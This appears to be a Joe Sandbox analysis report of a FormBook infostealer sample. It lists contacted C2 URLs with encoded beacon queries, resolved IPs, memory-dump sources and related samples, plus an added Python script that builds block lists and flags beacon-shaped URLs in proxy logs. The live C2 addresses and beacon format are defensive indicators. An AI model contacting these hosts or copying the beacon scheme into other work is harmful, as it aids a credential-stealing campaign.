http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj | 0% | Avira URL Cloud | safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe
https://static.loopia.se/shared/style/2022-extra-pages.css | 0% | Avira URL Cloud | safe
http://www.buyspeechst.shop/qzi3/?nzs0T2=ZstwWiqc2nBlehIthXm/ZN/AUPsgXrD51lhdEOCLGCvwhgyybv3tjhbgBMsRsRSNQM92qNeXuPeIY/BunbCcNNF518/3bUb+8prHuu4wGUKr0baD/E+zEK5A15FFaZBXoYSAzP4=&mLFl=BXYPt2lXBpi8Dj | 0% | Avira URL Cloud | safe
https://static.loopia.se/responsive/images/iOS-114.png | 0% | Avira URL Cloud | safe
http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo | 0% | Avira URL Cloud | safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | 0% | Avira URL Cloud | safe
http://www.did-ready.info/89qa/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=0pCqxWaHoeLxNwZtE4rbCif976qK0EABSkz9gYzxYmn//CJHUgPOWYHQR+claPVZDeQXO3fZA6HYGFtXbggvb1fmL/sutHarBSn3QusyefFvRxXanRf+9ESPTUwnwk3mbGErQuw= | 0% | Avira URL Cloud | safe
http://www.Deacapalla.online | 0% | Avira URL Cloud | safe
http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj | 0% | Avira URL Cloud | safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | 0% | Avira URL Cloud | safe
http://www.buyspeechst.shop/qzi3/ | 0% | Avira URL Cloud | safe
http://www.winningpath.xyz/4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw= | 0% | Avira URL Cloud | safe
http://www.infovea.tech/3irn/ | 0% | Avira URL Cloud | safe
http://www.milp.store/oqbp/ | 0% | Avira URL Cloud | safe
http://www.milp.store/oqbp/?nzs0T2=nVdj0w1j4FwXyGo+Obq+FyeO6yYPj1Biv/jBCQDtLkRj70mDH/TDAXa41L+hW2L/B4b9RwzGZeA1aKeiLPIgFZPHXdsTU40dEdaTH5HUY4e23s7HRqJoCIa7IuMIjt9j0jZPQBo=&mLFl=BXYPt2lXBpi8Dj | 0% | Avira URL Cloud | safe
https://static.loopia.se/responsive/styles/reset.css | 0% | Avira URL Cloud | safe
http://www.dodowo.shop/44mq/ | 0% | Avira URL Cloud | safe
http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns | 0% | Avira URL Cloud | safe
http://www.dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj | 0% | Avira URL Cloud | safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe
http://www.deacapalla.online/sdkp/ | 0% | Avira URL Cloud | safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe
https://static.loopia.se/responsive/images/iOS-57.png | 0% | Avira URL Cloud | safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin | 0% | Avira URL Cloud | safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | 0% | Avira URL Cloud | safe
http://www.infovea.tech | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.deacapalla.online | 208.91.197.27 | true | true | | unknown
infovea.tech | 76.223.67.189 | true | true | | unknown
www.winningpath.xyz | 209.74.79.41 | true | true | | unknown
www.mosquitoxp.lol | 127.0.0.1 | true | false | | unknown
www.milp.store | 194.9.94.86 | true | true | | unknown
www.did-ready.info | 194.245.148.189 | true | true | | unknown
zcdn.8383dns.com | 134.122.133.80 | true | true | | unknown
www.buyspeechst.shop | 104.21.112.1 | true | true | | unknown
dodowo.shop | 112.175.247.179 | true | true | | unknown
www.clubhoodies.shop | unknown | unknown | false | | unknown
www.apptj7.xyz | unknown | unknown | true | | unknown
www.vipstargold.buzz | unknown | unknown | false | | unknown
www.infovea.tech | unknown | unknown | false | | unknown
www.jrcov55qgcxp5fwa.top | unknown | unknown | false | | unknown
www.1337street.shop | unknown | unknown | false | | unknown
www.thomet.net | unknown | unknown | false | | unknown
www.dodowo.shop | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.did-ready.info/89qa/ | true | Avira URL Cloud: safe | unknown
http://www.winningpath.xyz/4p8s/ | true | Avira URL Cloud: safe | unknown
http://www.deacapalla.online/sdkp/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=Q2+U6NJof87KeL/xy+i0CIZPloZmzWZffj5EOQwXnkLhXENSPXaDW5SWGBVddIYwsB7Goe8a5E1AtdXY7h1Pcmgoj2AAtURgmOzcQSlReXoBGqrKsD90xFxRspg0pw2NsQGlTC8= | true | Avira URL Cloud: safe | unknown
http://www.buyspeechst.shop/qzi3/?nzs0T2=ZstwWiqc2nBlehIthXm/ZN/AUPsgXrD51lhdEOCLGCvwhgyybv3tjhbgBMsRsRSNQM92qNeXuPeIY/BunbCcNNF518/3bUb+8prHuu4wGUKr0baD/E+zEK5A15FFaZBXoYSAzP4=&mLFl=BXYPt2lXBpi8Dj | true | Avira URL Cloud: safe | unknown
http://www.did-ready.info/89qa/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=0pCqxWaHoeLxNwZtE4rbCif976qK0EABSkz9gYzxYmn//CJHUgPOWYHQR+claPVZDeQXO3fZA6HYGFtXbggvb1fmL/sutHarBSn3QusyefFvRxXanRf+9ESPTUwnwk3mbGErQuw= | true | Avira URL Cloud: safe | unknown
http://www.buyspeechst.shop/qzi3/ | true | Avira URL Cloud: safe | unknown
http://www.winningpath.xyz/4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw= | true | Avira URL Cloud: safe | unknown
http://www.infovea.tech/3irn/ | true | Avira URL Cloud: safe | unknown
http://www.milp.store/oqbp/ | true | Avira URL Cloud: safe | unknown
http://www.milp.store/oqbp/?nzs0T2=nVdj0w1j4FwXyGo+Obq+FyeO6yYPj1Biv/jBCQDtLkRj70mDH/TDAXa41L+hW2L/B4b9RwzGZeA1aKeiLPIgFZPHXdsTU40dEdaTH5HUY4e23s7HRqJoCIa7IuMIjt9j0jZPQBo=&mLFl=BXYPt2lXBpi8Dj | true | Avira URL Cloud: safe | unknown
http://www.dodowo.shop/44mq/ | true | Avira URL Cloud: safe | unknown
http://www.deacapalla.online/sdkp/ | true | Avira URL Cloud: safe | unknown
http://www.dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj | true | Avira URL Cloud: safe | unknown
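Every URL the report marks malicious in the table above carries an Avira URL Cloud verdict of "safe". That verdict is a URL-reputation lookup and says nothing about what the sandbox observed; the malicious flag rests on the FormBook Yara match and the injection and theft behaviour in the graph, which is the usual situation with freshly registered C2 domains. The C2 URLs share one shape: a single four-character path segment (/4p8s/, /89qa/, /qzi3/, /oqbp/, /44mq/, /sdkp/, /3irn/) and, when a query is present, parameter values made of the base64 alphabet. The many loopia.com and static.loopia.se URLs with utm_source=loopia_parkingweb are parking-page content (www.milp.store is hosted at LOOPIASE per the graph), and the digi-searches.com and i4.cdn-image.com strings look like the same kind of parked-domain residue. The Python below is an added example, not part of the Joe Sandbox report: it builds block-list material from the URL and DNS tables (copied from the page), flags URLs with the C2 shape regardless of host, and runs both checks over constructed proxy log lines. The host parked-host.example, the intranet host and the four-field log format are made up for the example; the query key names mLFl and nzs0T2 belong to this sample's campaign and are deliberately not part of the check.

```python
import re
from urllib.parse import urlparse

# URLs the report marks malicious (copied from the table above).
REPORT_C2_URLS = [
    "http://www.did-ready.info/89qa/",
    "http://www.winningpath.xyz/4p8s/",
    "http://www.buyspeechst.shop/qzi3/",
    "http://www.infovea.tech/3irn/",
    "http://www.milp.store/oqbp/",
    "http://www.dodowo.shop/44mq/",
    "http://www.deacapalla.online/sdkp/",
    "http://www.winningpath.xyz/4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw=",
]

# Name/IP pairs from the report's DNS table (copied from the page).
REPORT_DNS = {
    "www.winningpath.xyz": "209.74.79.41",
    "www.milp.store": "194.9.94.86",
    "www.did-ready.info": "194.245.148.189",
    "www.deacapalla.online": "208.91.197.27",
    "www.mosquitoxp.lol": "127.0.0.1",  # resolved to localhost in the report: useless as a network IOC
}

# Beacon shape seen in this report: one 4-character path segment, and a query
# (when present) whose values use only the base64 alphabet.  The key names
# mLFl / nzs0T2 are specific to this sample and deliberately not hard-coded.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def extract_iocs(urls, dns):
    """Block-list material: hosts and path tokens from the URLs, routable IPs from DNS."""
    return {
        "hosts": {urlparse(u).hostname for u in urls},
        "paths": {urlparse(u).path for u in urls},
        "ips": {ip for ip in dns.values() if not ip.startswith("127.")},
    }


def is_beacon_like(url):
    """True when the URL has the C2 shape above, whatever the host."""
    p = urlparse(url)
    if p.scheme not in ("http", "https") or not PATH_RE.match(p.path):
        return False
    if not p.query:
        return True
    # Split by hand: parse_qs would turn '+' in base64 values into spaces.
    for part in p.query.split("&"):
        key, sep, value = part.partition("=")
        if not sep or not key.isalnum() or not B64_RE.match(value):
            return False
    return True


def scan_proxy_log(lines, iocs):
    """Each line is 'epoch client method url' (a constructed format, not a
    real proxy's).  Returns (client, url, reason) for every hit."""
    hits = []
    for line in lines:
        _ts, client, _method, url = line.split()
        host = urlparse(url).hostname
        if host in iocs["hosts"]:
            hits.append((client, url, "known-c2-host"))
        elif is_beacon_like(url):
            hits.append((client, url, "beacon-shape"))
    return hits


# Constructed proxy lines: one real C2 beacon from the report, one benign
# loopia asset also in the report, one assumed unlisted host with the C2
# shape, and one ordinary intranet request.
SAMPLE_LOG = [
    "1736503000 10.0.0.5 GET http://www.winningpath.xyz/4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35G=",
    "1736503001 10.0.0.5 GET https://static.loopia.se/responsive/styles/reset.css",
    "1736503002 10.0.0.7 GET http://parked-host.example/ab12/?k=QUJDREVG",
    "1736503003 10.0.0.9 GET http://intranet.example/wiki/page?title=Home",
]

if __name__ == "__main__":
    iocs = extract_iocs(REPORT_C2_URLS, REPORT_DNS)
    for client, url, reason in scan_proxy_log(SAMPLE_LOG, iocs):
        print(f"{reason:15} {client:10} {url}")
```

The shape check is a hunting aid, not a blocking rule: a four-character path with a base64 query is rare on a corporate proxy but not unique to FormBook, so treat "beacon-shape" hits as leads to pivot on (same client, same destination family, regular cadence) while "known-c2-host" hits from the report's own IOC list can go straight to the block list.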
Memory dump sources referenced in the Source column:
S1 = RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmp
S2 = RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp
S3 = RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp
S4 = XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmp
S5 = RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp
S6 = XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmp
S7 = RmClient.exe, 00000006.00000002.4012231174.0000000004334000.00000004.10000000.00040000.00000000.sdmp
S8 = XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003874000.00000004.00000001.00040000.00000000.sdmp
S9 = RmClient.exe, 00000006.00000002.4012231174.0000000004010000.00000004.10000000.00040000.00000000.sdmp
S10 = XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003550000.00000004.00000001.00040000.00000000.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | S1 | false | | high
http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online | S2, S3, S4 | false | Avira URL Cloud: safe | unknown
https://dts.gnpge.com | S4 | false | | high
https://duckduckgo.com/ac/?q= | S1 | false | | high
http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3H | S2, S3, S4 | false | Avira URL Cloud: safe | unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | S2, S3, S4 | false | | high
https://cdn.consentmanager.net | S2, S4 | false | | high
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | S2, S3, S4 | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | S1 | false | | high
https://static.loopia.se/responsive/images/iOS-72.png | S5, S6 | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | S5, S6 | false | Avira URL Cloud: safe | unknown
http://digi-searches.com/display.cfm | S2, S3, S4 | false | Avira URL Cloud: safe | unknown
http://i4.cdn-image.com/__media__/pics/29590/bg1.png) | S2, S3, S4 | false | | high
https://static.loopia.se/shared/logo/logo-loopia-white.svg | S5, S6 | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | S5, S6 | false | Avira URL Cloud: safe | unknown
https://joker.com/?pk_campaign=Parking&pk_kwd=text | S7, S8 | false | | high
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | S5, S6 | false | Avira URL Cloud: safe | unknown
http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTjn | S2, S3, S4 | false | Avira URL Cloud: safe | unknown
http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HT | S2, S3, S4 | false | Avira URL Cloud: safe | unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | S2, S3, S4 | false | | high
http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | S2, S3, S4 | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | S1 | false | | high
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | S5, S6 | false | Avira URL Cloud: safe | unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | S2, S3, S4 | false | | high
http://i4.cdn-image.com/__media__/pics/28903/search.png) | S2, S3, S4 | false | | high
http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo | S9, S10 | false | Avira URL Cloud: safe | unknown
http://i4.cdn-image.com/__media__/pics/28905/arrrow.png) | S2, S3, S4 | false | | high
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | S5, S6 | false | Avira URL Cloud: safe | unknown
https://delivery.consentmanager.net | S2, S4 | false | | high
http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj | S2, S3, S4 | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/shared/style/2022-extra-pages.css | S5, S6 | false | Avira URL Cloud: safe | unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | S2, S3, S4 | false | | high
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | S2, S3, S4 | false | | high
https://static.loopia.se/responsive/images/iOS-114.png | S5, S6 | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | S1 | false | | high
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | S5, S6 | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | S1 | false | | high
http://www.Deacapalla.online | S2, S3, S4 | false | Avira URL Cloud: safe | unknown
http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj | S2, S3, S4 | false | Avira URL Cloud: safe | unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | S2, S3, S4 | false | | high
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | S5, S6 | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | S1 | false | | high
https://static.loopia.se/responsive/styles/reset.css | S5, S6 | false |
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://ac.ecosia.org/autocomplete?q=RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://static.loopia.se/responsive/images/iOS-57.pngRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=nsRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://i4.cdn-image.com/__media__/js/min.js?v2.3RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.infovea.techXBOIFKGKIWT.exe, 00000008.00000002.4014572631.0000000004C99000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
IP              | Domain                 | Country                  | ASN   | ASN Name                  | Malicious
194.9.94.86     | www.milp.store         | Sweden                   | 39570 | LOOPIASE                  | true
104.21.112.1    | www.buyspeechst.shop   | United States            | 13335 | CLOUDFLARENETUS           | true
209.74.79.41    | www.winningpath.xyz    | United States            | 31744 | MULTIBAND-NEWHOPEUS       | true
194.245.148.189 | www.did-ready.info     | Germany                  | 5517  | CSLDE                     | true
76.223.67.189   | infovea.tech           | United States            | 16509 | AMAZON-02US               | true
208.91.197.27   | www.deacapalla.online  | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG  | true
134.122.133.80  | zcdn.8383dns.com       | United States            | 64050 | BCPL-SGBGPNETGlobalASNSG  | true
112.175.247.179 | dodowo.shop            | Korea Republic of        | 4766  | KIXS-AS-KRKoreaTelecomKR  | true
Private IP: 127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588022
Start date and time: 2025-01-10 20:46:58 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 9MZZG92yMO.exe (renamed because the original name is a hash value)
Original Sample Name: c3435c7d8eb6822ff755dd1f48266e8bc267a8d8b87fee7a4ebe8ec8efdd1c30.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@15/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 49
• Number of non-executed functions: 278
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
• Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    No simulations
Match        | Associated Sample Name / URL        | Detection | Threat Name                   | Context
194.9.94.86  | new.exe                             | malicious | FormBook                      | www.milp.store/2j93/
194.9.94.86  | PO 1202495088.exe                   | malicious | FormBook                      | www.milp.store/2j93/
194.9.94.86  | Hire P.O.exe                        | malicious | FormBook                      | www.deeplungatlas.org/57zf/
194.9.94.86  | Arrival Notice.bat.exe              | malicious | FormBook                      | www.torentreprenad.com/r45o/
194.9.94.86  | P1 HWT623ATG.bat.exe                | malicious | FormBook, GuLoader            | www.torentreprenad.com/r45o/
194.9.94.86  | BASF Purchase Order.doc             | malicious | FormBook                      | www.xn--matfrmn-jxa4m.se/ufuh/
